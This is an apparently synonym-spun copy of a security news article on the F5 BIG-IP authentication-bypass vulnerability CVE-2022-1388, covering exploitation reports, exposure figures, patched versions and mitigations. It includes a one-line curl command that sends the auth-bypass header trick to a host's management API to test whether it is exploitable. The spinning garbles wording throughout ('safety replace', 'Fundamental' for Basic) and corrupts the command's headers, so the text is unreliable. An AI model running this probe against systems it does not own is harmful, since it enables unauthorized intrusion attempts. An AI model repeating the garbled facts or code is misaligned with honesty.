Heads up for community directors with F5’s BIG-IP household of networking units of their surroundings: There’s a new safety replace out there for the newly disclosed important distant code execution vulnerability (CVE-2022-1388). A number of safety researchers have already created working exploits, so directors want to maneuver rapidly and safe their networks earlier than the attackers come knocking.
Based on safety researcher Kevin Beaumont, attackers are already attempting to use the flaw and and dropping webshells. The vulnerability is “trivial” to use, Horizon3 mentioned on Twitter. Horizon3 is among the many a number of teams which have already developed a working exploit.
The important flaw (with a rating of 9.8 underneath the Widespread Vulnerability Scoring System) impacts the BIG-IP iControl REST authentication element, F5 mentioned on Might 4. If exploited, distant adversaries can bypass authentication and execute instructions with elevated privileges. They may goal this vulnerability to achieve preliminary entry to the community and transfer laterally to entry different units on the community.
Contemplating that BIG-IP units are extensively utilized in enterprise environments and serve the function of a load balancer, utility firewall, and full proxy, this flaw doubtlessly opens enterprise networks to quite a lot of assaults. Adversaries would be capable to steal company knowledge, set up cryptominers, obtain and set up malware and backdoors, and even disrupt regular enterprise operations by launching a ransomware assault.
Evaluation: Is Your Group Impacted?
BIG-IP is utilized by 48 of the Fortune 50, F5 says, and there are greater than 16,000 situations of BIG-IP discoverable by Shodan. Nonetheless, the vulnerability impacts the administration interface, so the weak units are those the place the administration interface is uncovered to the Web. Based on Rapid7 lead safety researcher Jacob Baines, that places the variety of affected BIG-IP units nearer to 2,500.
Directors can execute the next one-line bash command from Randori to find out if their occasion of BIG-IP is exploitable (substitute the ADDRESS with the host IP in an effort to execute the command):
HOST=ADDRESS; if curl -s https://$HOST/mgmt/tm --insecure -H "Authorization: Fundamental YWRtaW46" -H "X-F5-Auth-Token: 1" -H "Connection: X-Forwarded-Host, X-F5-Auth-Token" -H "Content material-Size: 0" | grep -q ""gadgets":["; then printf "n[*] $HOST is vulnerablen"; else printf "n[*] $HOST does not seem vulnerablen"; fi
The command’s output could be both a [*] 192.168.255.2 (for instance) is weak or [*] 192.168.255.2 does not seem weak message.
Apply the Safety Replace
F5 has launched safety updates for BIG-IP for the next firmware variations:
- BIG-IP variations 16.1.0 to 16.1.2
- BIG-IP variations 15.1.0 to fifteen.1.5
- BIG-IP variations 14.1.0 to 14.1.4
- BIG-IP variations 13.1.0 to 13.1.4
There isn’t any safety replace being launched for firmware variations 11.x and 12.x (11.6.1 to 11.6.5 and 12.1.0 to 12.1.6) as they’re not supported. Directors ought to improve to a more moderen model as quickly as doable.
Apply Mitigations The place Wanted
F5 launched three mitigations for these circumstances the place the BIG-IP units can’t be up to date immediately. The mitigations are supposed to be a short lived measure — directors ought to apply the replace, or within the case of an unsupported firmware model, to improve to the newer model, as quickly as doable.